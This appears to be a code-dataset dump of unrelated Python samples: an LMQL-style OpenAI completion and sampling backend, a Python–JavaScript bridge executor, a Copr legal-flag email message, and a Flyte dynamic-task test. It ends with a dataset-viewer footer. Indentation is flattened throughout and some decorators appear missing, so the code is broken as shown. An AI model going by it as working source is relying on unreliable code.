if ((len(input_ids) > 0) and (input_ids[0] == self.tokenizer.bos_token_id)):
input_ids = input_ids[1:]
temperature = completion_call.kwargs.get('temperature', 0.0)
logprobs = completion_call.kwargs.get('logprobs', 5)
noscore = completion_call.kwargs.get('noscore', False)
max_tokens = (completion_call.kwargs.get('max_tokens_hint') or self.model.chunk_size)
kwargs = {'model': self.model.model_identifier, 'prompt': prompt_str, 'max_tokens': max_tokens, 'temperature': temperature, 'logprobs': logprobs, 'user': 'lmql', 'stream': True, 'echo': True, **({'api_config': self.api_config} if (self.api_config is not None) else {}), **({'timeout': self.timeout} if (self.timeout is not None) else {}), **self.extra_decoding_parameters}
mode = completion_call.mode
if (mode == '*'):
pass
elif (mode == 'complete'):
logit_bias = completion_call.api_mask
if ((len(logit_bias) > 0) and (max(logit_bias.values()) == 100) and (len(logit_bias) < 10)):
kwargs['max_tokens'] = min(kwargs['max_tokens'], 4)
kwargs.update({'logit_bias': logit_bias})
elif (mode == 'fixed'):
fixed_next_token = completion_call.logit_mask_or_fixed_id
if (fixed_next_token == self.eos):
return CompletionResult(openai.response_buffer.singleton(token=fixed_next_token, token_logprob=0), completion_call.continuation_type, completion_call.logit_mask_or_fixed_id)
else:
if noscore:
logprob = 0.0
else:
logprob = (await self.api_score(np.append(input_ids, nputil.ensure_array(fixed_next_token).reshape((- 1)), axis=0), (- 1)))
return CompletionResult(openai.response_buffer.singleton(token=fixed_next_token, token_logprob=logprob), completion_call.continuation_type, completion_call.logit_mask_or_fixed_id)
else:
assert False, f'Internal openai API dispatcher returned an unknown completion mode {mode}'
if (len(completion_call.stopping_phrases) > 0):
if (len(completion_call.stopping_phrases) > 4):
warnings.warn('warning: the number of stopping phrases that would need to be passed to the OpenAI API is greater than 4. Since the OpenAI API only supports up to 4 stopping phrases, the first 4 stopping phrases will be passed to the API. Other stopping phrases will also be enforced, but may lead to an increase in the number of tokens billed to the user.')
if (not self.model.nostop):
kwargs.update({'stop': completion_call.stopping_phrases[:4]})
kwargs['tracer'] = active_tracer()
buffer = (await openai.async_buffer((await openai.Completion.create(**kwargs)), tokenizer=self.tokenize_list))
t = b''
to_skip = b''.join(input_ids)
if (len(input_ids) == 0):
to_skip = b'<|endoftext|>'
while (len(t) < len(to_skip)):
skipped = (await buffer.get(0))
skipped = skipped['logprobs']['tokens']
skipped = b''.join(self.convert([skipped]))
t += skipped
buffer = buffer[1:]
return CompletionResult(buffer, completion_call.continuation_type, completion_call.logit_mask_or_fixed_id)
async def tokenize_list(self, tokens: List[str]):
if ((len(tokens) > 0) and (type(tokens[0]) is str)):
return [[t[0]] for t in (await self.model.tokenize(tokens))]
return tokens
def count_billed_tokens(self, n, model):
if (model not in self.num_billed_tokens.keys()):
self.num_billed_tokens[model] = 0
self.num_billed_tokens[model] += n
self.num_requests += 1
async def completion_buffer(self, seqs, temperature=1, sampling_modes=None, **kwargs):
kwargs.update({'temperature': temperature})
if (sampling_modes is None):
sampling_modes = ['top-1' for _ in range(len(seqs))]
async def get_buffer(i, s):
constrained_seqs = np.array([s.is_query_constrained], dtype=np.bool_)
logits_mask_result = (await self.compute_logits_mask(s.input_ids.reshape(1, (- 1)), [s.user_data], constrained_seqs, [s], **kwargs))
logits_mask = logits_mask_result.logits_mask[0]
kwargs['max_tokens_hint'] = logits_mask_result.max_tokens_hints[0]
if (s.user_data is None):
s.user_data = {}
s.user_data = deepmerge(deepcopy(s.user_data), logits_mask_result.user_data[0])
s.user_data['set_by'] = 'where'
completion_call = self.prepare_completion_call(s, logits_mask, sampling_modes[i], **kwargs)
if (s.data('openai-continuations') is not None):
continuations: CompletionResult = s.data('openai-continuations')
continuation_type = completion_call.continuation_type
if (continuation_type in continuations):
continuation = continuations[continuation_type]
if (await continuation.buffer.empty()):
del s.data('openai-continuations')[continuation_type]
else:
return continuation
if (is_deterministic(s) and (len(s.next_ids) > 0)):
return CompletionResult(openai.response_buffer.singleton(token=s.next_ids[0], token_logprob=s.next_logprobs[0]), None, None)
completion_result = (await self.async_complete(completion_call))
if (self.cache_delegate is not None):
(await self.expand_and_cache(s, completion_result, sampling_modes[i], logprobs=kwargs.get('logprobs', 1)))
assert (not (await completion_result.buffer.empty())), 'Completion result is empty on arrival: {}'.format(str([(await self.detokenize(completion_call.input_ids))]))
return completion_result
return (await asyncio.gather(*[get_buffer(i, s) for (i, s) in enumerate(seqs)]))
async def expand_and_cache(self, s: DecoderSequence, completion_result: CompletionResult, sampling_mode, logprobs=1):
_res = (await completion_result.buffer.get(0))
async def token_stream():
nonlocal sampling_mode, s, completion_result
response_buffer = completion_result.buffer
tokens = []
scores = []
while True:
try:
if (await response_buffer.empty()):
break
res = (await response_buffer.get(0))
top_entries = {}
topprobs = res['logprobs']['top_logprobs']
if ((topprobs is not None) and (logprobs > 1)):
topk_tokens = list(topprobs.items())
topk_tokens = [(tok, score) for ((tok_str, score), tok) in zip(topk_tokens, [s for (s, _) in topk_tokens])]
topk_tokens += [(tokens[0], scores)]
topk_tokens = list(dict.fromkeys(topk_tokens))
topk_tokens = sorted(topk_tokens, key=(lambda x: x[1]), reverse=True)
topk_tokens = topk_tokens[:logprobs]
top_entries = {tok: score for (tok, score) in topk_tokens}
scores = {}
for (t, s) in top_entries:
scores[t] = s
if (sampling_mode == 'top-1'):
scores[res['logprobs']['tokens']] = res['logprobs']['token_logprobs']
top_entries = list(sorted(scores.items(), key=(lambda x: x[1]), reverse=True))
tokens = [t for (t, _) in top_entries]
scores = [s for (_, s) in top_entries]
edge_type = ['top-{}'.format((i + 1)) for i in range(len(tokens))]
if (sampling_mode != 'top-1'):
tokens = ([res['logprobs']['tokens']] + tokens)
scores = ([res['logprobs']['token_logprobs']] + scores)
edge_type = ([sampling_mode] + edge_type)
tokens = self.convert(tokens)
response_buffer = response_buffer[1:]
continuation = CompletionResult(response_buffer, completion_result.continuation_type, completion_result.logit_mask_or_fixed_id)
if (continuation.continuation_type is None):
edge_type = None
user_data = {'openai-continuations': {continuation.continuation_type: continuation}}
if ('sample-id' in sampling_mode):
user_data['dc-edge-type'] = sampling_mode
scores = [(0.0 if (str(s) == '[]') else s) for s in scores]
(yield (s, tokens, scores, edge_type, user_data))
except IndexError:
break
self.register_token_stream(token_stream)
async def argmax(self, sequences, **kwargs):
return (await self.sample(sequences, num_samples=1, temperature=0, **kwargs))
def report_stats(self, printer, decoder_step=None):
if (printer is None):
return
if hasattr(printer, 'report_model_stats'):
s = openai.Completion.get_stats()
data = {'tokens': s.tokens, 'model': self.model_identifier, 'req.': s.requests, 'avb': f'{(float(s.sum_batch_size) / max(1, s.requests)):.2f}'}
if (decoder_step is not None):
data['_step'] = decoder_step
printer.report_model_stats(**data)
async def sample(self, sequences, num_samples=1, **kwargs):
kwargs = {**self.model_args, **kwargs}
async def op_sample(seqs):
temperature = kwargs.get('temperature', 1.0)
if (temperature == 0.0):
sampling_modes = ['top-1' for _ in range(len(seqs))]
edge_type_populated_user_data = [{} for _ in range(len(seqs))]
else:
sampling_modes = [f'sample-{temperature}-sample-id-{random.randint(0, ((2 ** 32) - 1))}' for _ in range(len(seqs))]
edge_type_populated_user_data = [{'dc-edge-type': sm} for sm in sampling_modes]
completions: List[CompletionResult] = (await self.completion_buffer(seqs, logprobs=num_samples, sampling_modes=sampling_modes, **kwargs))
next_token_ids = []
next_token_scores = []
logits = []
continuation_buffers: List[CompletionResult] = []
for (s, completion) in zip(seqs, completions):
assert (not (await completion.buffer.empty())), 'Completion buffer is empty {}'.format(completion.buffer)
complete_data = (await completion.buffer.get(0))
continuation = CompletionResult(completion.buffer[1:], completion.continuation_type, completion.logit_mask_or_fixed_id)
continuation_buffers.append(continuation)
if ('fixed' in complete_data.keys()):
next_token = [complete_data['logprobs']['tokens']]
next_token_score = complete_data['logprobs']['token_logprobs']
if (str(next_token_score) == '[]'):
next_token_score = np.array([0.0])
next_token_ids.append(np.array([next_token]))
next_token_scores.append(np.array([next_token_score], dtype=np.float32))
full_logits = TokenDistribution()
full_logits[next_token] = next_token_score
logits.append(full_logits)
continue
next_token = complete_data['logprobs']['tokens']
next_token_score = (complete_data['logprobs']['token_logprobs'] or 0.0)
if (complete_data['logprobs']['top_logprobs'] is None):
complete_data['logprobs']['top_logprobs'] = {complete_data['logprobs']['tokens']: 0.0}
probs = sorted(list(complete_data['logprobs']['top_logprobs'].items()))
logprobs = [p[1] for p in probs]
tokens = [p[0] for p in probs]
distribution = TokenDistribution()
distribution[tokens] = logprobs
distribution[next_token] = np.finfo(np.float32).min
mask = completion.logit_mask_or_fixed_id
if (mask is None):
pass
elif (type(mask) is int):
distribution[mask] = np.finfo(np.float32).min
else:
distribution[(mask < 0)] = np.finfo(np.float32).min
(additional_sampled_token_ids, _) = distribution.sample(num_samples=(num_samples - 1))
seq_next_token_ids = ([next_token] + additional_sampled_token_ids)
distribution[next_token] = next_token_score
seq_next_token_scores = distribution.score(seq_next_token_ids)
next_token_ids.append(seq_next_token_ids)
next_token_scores.append(seq_next_token_scores)
logits.append(distribution)
token_ids = [self.convert(t) for t in next_token_ids]
logits = logits
next_token_ids = token_ids
next_token_scores = next_token_scores
def successor_user_data(continuation_buffer: SequenceResult, num_successors, user_data):
default_user_data = {**user_data}
if (continuation_buffer.continuation_type is None):
return ([default_user_data.copy()] * num_successors)
continuation_as_user_data = {'openai-continuations': {continuation_buffer.continuation_type: continuation_buffer}, **default_user_data.copy()}
return ([continuation_as_user_data] + ([default_user_data.copy()] * (num_successors - 1)))
return [s.make_successors(next_token_ids[i], next_token_scores[i], logits=logits[i], user_data=successor_user_data(continuation_buffers[i], len(next_token_ids[i]), edge_type_user_data)) for (i, s, edge_type_user_data) in zip(range(len(seqs)), seqs, edge_type_populated_user_data)]
with self.stats.timer('sample'):
return (await sequences.aelement_wise(op_sample))
def frombytes(self, s):
r = []
i = 0
while (i < len(s)):
if (s[i:(i + 2)] == '\\x'):
if (len(s) < (i + 3)):
r += [ord(s[i])]
i += 1
else:
r += [int(s[(i + 2):(i + 4)], 16)]
i += 4
else:
r += [ord(s[i])]
i += 1
return bytes(r)
def convert(self, token):
result = []
for t in token:
if ((type(t) is int) or (type(t) is np.int64) or ((type(t) is np.ndarray) and (t.dtype != np.str_))):
result.append(t)
elif (type(t) is bytes):
result.append(t)
elif t.startswith('bytes:'):
result.append(self.frombytes(t[6:]))
else:
result.append(t.encode('utf-8'))
return result
async def topk_continuations(self, sequences, k, **kwargs):
assert (k <= 5), 'The OpenAI API only supports topk probabilities with k <= 5'
assert (k >= 1), 'topk_continuations() requires k >= 1'
assert (not model_info(self.model_identifier).is_chat_model), f"Chat API models do not support topk_continuations which is required for the requested decoding algorithm, use 'sample' or 'argmax' instead."
kwargs = {**self.model_args, **kwargs}
kwargs.update({'temperature': 0.0})
async def op_topk(seqs):
completions: List[CompletionResult] = (await self.completion_buffer(seqs, logprobs=k, **kwargs))
next_token_ids = []
next_token_scores = []
logits = []
continuation_buffers: List[CompletionResult] = []
for (s, completion) in zip(seqs, completions):
complete_data = (await completion.buffer.get(0))
continuation = CompletionResult(completion.buffer[1:], completion.continuation_type, completion.logit_mask_or_fixed_id)
continuation_buffers.append(continuation)
if ('fixed' in complete_data.keys()):
next_token = [complete_data['logprobs']['tokens']]
next_token_score = complete_data['logprobs']['token_logprobs']
if (str(next_token_score) == '[]'):
next_token_score = np.array([0.0])
next_token_ids.append(np.array([next_token]))
next_token_scores.append(np.array([next_token_score], dtype=np.float32))
distribution = TokenDistribution()
distribution[next_token] = next_token_score
logits.append(distribution)
continue
next_token = complete_data['logprobs']['tokens']
next_token_score = complete_data['logprobs']['token_logprobs']
probs = sorted(list(complete_data['logprobs']['top_logprobs'].items()), key=(lambda x: x[1]), reverse=True)
logprobs = [p[1] for p in probs]
tokens = [p[0] for p in probs]
distribution = TokenDistribution()
distribution[tokens] = logprobs
mask = completion.logit_mask_or_fixed_id
if (mask is None):
pass
elif (type(mask) is int):
distribution[mask] = np.finfo(np.float32).min
else:
distribution[(mask < 0)] = np.finfo(np.float32).min
(tokens, logprobs) = distribution.topk(k=k)
next_token_ids.append(tokens)
next_token_scores.append(logprobs)
logits.append(distribution)
next_token_ids = [self.convert(t) for t in next_token_ids]
def successor_user_data(continuation_buffer: SequenceResult, num_successors):
default_user_data = {}
if (continuation_buffer.continuation_type is None):
return ([default_user_data.copy()] * num_successors)
continuation_as_user_data = {'openai-continuations': {continuation_buffer.continuation_type: continuation_buffer}, **default_user_data.copy()}
return ([continuation_as_user_data] + ([default_user_data.copy()] * (num_successors - 1)))
return [s.make_successors(next_token_ids[i], next_token_scores[i], logits=logits[i], user_data=successor_user_data(continuation_buffers[i], len(next_token_ids[i]))) for (i, s) in enumerate(seqs)]
with self.stats.timer('topk'):
return (await sequences.aelement_wise(op_topk))
def close(self):
pass |
class Executor():
def __init__(self, loop):
self.loop = loop
loop.pyi.executor = self
self.queue = loop.queue_request
self.i = 0
self.bridge = self.loop.pyi
def ipc(self, action, ffid, attr, args=None):
self.i += 1
r = self.i
l = None
if (action == 'get'):
l = self.queue(r, {'r': r, 'action': 'get', 'ffid': ffid, 'key': attr})
elif (action == 'init'):
l = self.queue(r, {'r': r, 'action': 'init', 'ffid': ffid, 'key': attr, 'args': args})
elif (action == 'inspect'):
l = self.queue(r, {'r': r, 'action': 'inspect', 'ffid': ffid, 'key': attr})
elif (action == 'serialize'):
l = self.queue(r, {'r': r, 'action': 'serialize', 'ffid': ffid})
elif (action == 'blob'):
l = self.queue(r, {'r': r, 'action': 'blob', 'ffid': ffid})
elif (action == 'set'):
l = self.queue(r, {'r': r, 'action': 'set', 'ffid': ffid, 'key': attr, 'args': args})
elif (action == 'keys'):
l = self.queue(r, {'r': r, 'action': 'keys', 'ffid': ffid})
else:
assert False, f"Unhandled action '{action}'"
if (not l.wait(10)):
if (not config.event_thread):
print(config.dead)
print('Timed out', action, ffid, attr, repr(config.event_thread))
raise Exception(f"Timed out accessing '{attr}'")
(res, barrier) = self.loop.responses[r]
del self.loop.responses[r]
barrier.wait()
if ('error' in res):
raise JavaScriptError(attr, res['error'])
return res
def pcall(self, ffid, action, attr, args, *, timeout=1000, forceRefs=False):
wanted = {}
self.ctr = 0
(callRespId, ffidRespId) = ((self.i + 1), (self.i + 2))
self.i += 2
self.expectReply = False
packet = {'r': callRespId, 'action': action, 'ffid': ffid, 'key': attr, 'args': args}
def ser(arg):
if hasattr(arg, 'ffid'):
self.ctr += 1
return {'ffid': arg.ffid}
else:
self.ctr += 1
self.expectReply = True
wanted[self.ctr] = arg
return {'r': self.ctr, 'ffid': ''}
if forceRefs:
(_block, _locals) = args
packet['args'] = [args[0], {}]
flocals = packet['args'][1]
for k in _locals:
v = _locals[k]
if ((type(v) is int) or (type(v) is float) or (v is None) or (v is True) or (v is False)):
flocals[k] = v
else:
flocals[k] = ser(v)
packet['p'] = self.ctr
payload = json.dumps(packet)
else:
payload = json.dumps(packet, default=ser)
payload = (payload[:(- 1)] + f',"p":{self.ctr}}}')
l = self.loop.queue_request(callRespId, payload)
if self.expectReply:
l2 = self.loop.await_response(ffidRespId)
if (not l2.wait(timeout)):
raise Exception('Execution timed out')
(pre, barrier) = self.loop.responses[ffidRespId]
del self.loop.responses[ffidRespId]
if ('error' in pre):
raise JavaScriptError(attr, res['error'])
for requestId in pre['val']:
ffid = pre['val'][requestId]
self.bridge.m[ffid] = wanted[int(requestId)]
try:
if hasattr(self.bridge.m[ffid], '__call__'):
setattr(self.bridge.m[ffid], 'iffid', ffid)
except Exception:
pass
barrier.wait()
if (not l.wait(timeout)):
if (not config.event_thread):
print(config.dead)
raise Exception(f"Call to '{attr}' timed out. Increase the timeout by setting the `timeout` keyword argument.")
(res, barrier) = self.loop.responses[callRespId]
del self.loop.responses[callRespId]
barrier.wait()
if ('error' in res):
raise JavaScriptError(attr, res['error'])
return (res['key'], res['val'])
def getProp(self, ffid, method):
resp = self.ipc('get', ffid, method)
return (resp['key'], resp['val'])
def setProp(self, ffid, method, val):
self.pcall(ffid, 'set', method, [val])
return True
def callProp(self, ffid, method, args, *, timeout=None, forceRefs=False):
resp = self.pcall(ffid, 'call', method, args, timeout=timeout, forceRefs=forceRefs)
return resp
def initProp(self, ffid, method, args):
resp = self.pcall(ffid, 'init', method, args)
return resp
def inspect(self, ffid, mode):
resp = self.ipc('inspect', ffid, mode)
return resp['val']
def keys(self, ffid):
return self.ipc('keys', ffid, '')['keys']
def free(self, ffid):
self.loop.freeable.append(ffid)
def get(self, ffid):
return self.bridge.m[ffid] |
class LegalFlagMessage(Message):
def __init__(self, copr, reporter, reason):
self.subject = 'Legal flag raised on {0}'.format(copr.name)
self.text = '{0}\nNavigate to {1}\nContact on owner is: {2} <{3}>\nReported by {4} <{5}>'.format(reason, flask.url_for('admin_ns.legal_flag', _external=True), copr.user.username, copr.user.mail, reporter.name, reporter.mail) |
def test_dc_dyn_directory(folders_and_files_setup):
proxy_c = MyProxyConfiguration(splat_data_dir='/tmp/proxy_splat', apriori_file='/opt/config/a_file')
proxy_p = MyProxyParameters(id='pp_id', job_i_step=1)
my_input_gcs = MyInput(main_product=FlyteFile(folders_and_files_setup[0]), apriori_config=MyAprioriConfiguration(static_data_dir=FlyteDirectory('gs://my-bucket/one'), external_data_dir=FlyteDirectory('gs://my-bucket/two')), proxy_config=proxy_c, proxy_params=proxy_p)
my_input_gcs_2 = MyInput(main_product=FlyteFile(folders_and_files_setup[0]), apriori_config=MyAprioriConfiguration(static_data_dir=FlyteDirectory('gs://my-bucket/three'), external_data_dir=FlyteDirectory('gs://my-bucket/four')), proxy_config=proxy_c, proxy_params=proxy_p)
def dt1(a: List[MyInput]) -> List[FlyteDirectory]:
x = []
for aa in a:
x.append(aa.apriori_config.external_data_dir)
return x
ctx = FlyteContextManager.current_context()
cb = ctx.new_builder().with_serialization_settings(SerializationSettings(project='test_proj', domain='test_domain', version='abc', image_config=ImageConfig(Image(name='name', fqn='image', tag='name')), env={})).with_execution_state(ctx.execution_state.with_params(mode=ExecutionState.Mode.TASK_EXECUTION))
with FlyteContextManager.with_context(cb) as ctx:
input_literal_map = TypeEngine.dict_to_literal_map(ctx, d={'a': [my_input_gcs, my_input_gcs_2]}, type_hints={'a': List[MyInput]})
dynamic_job_spec = dt1.dispatch_execute(ctx, input_literal_map)
assert (dynamic_job_spec.literals['o0'].collection.literals[0].scalar.blob.uri == 'gs://my-bucket/two')
assert (dynamic_job_spec.literals['o0'].collection.literals[1].scalar.blob.uri == 'gs://my-bucket/four') |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.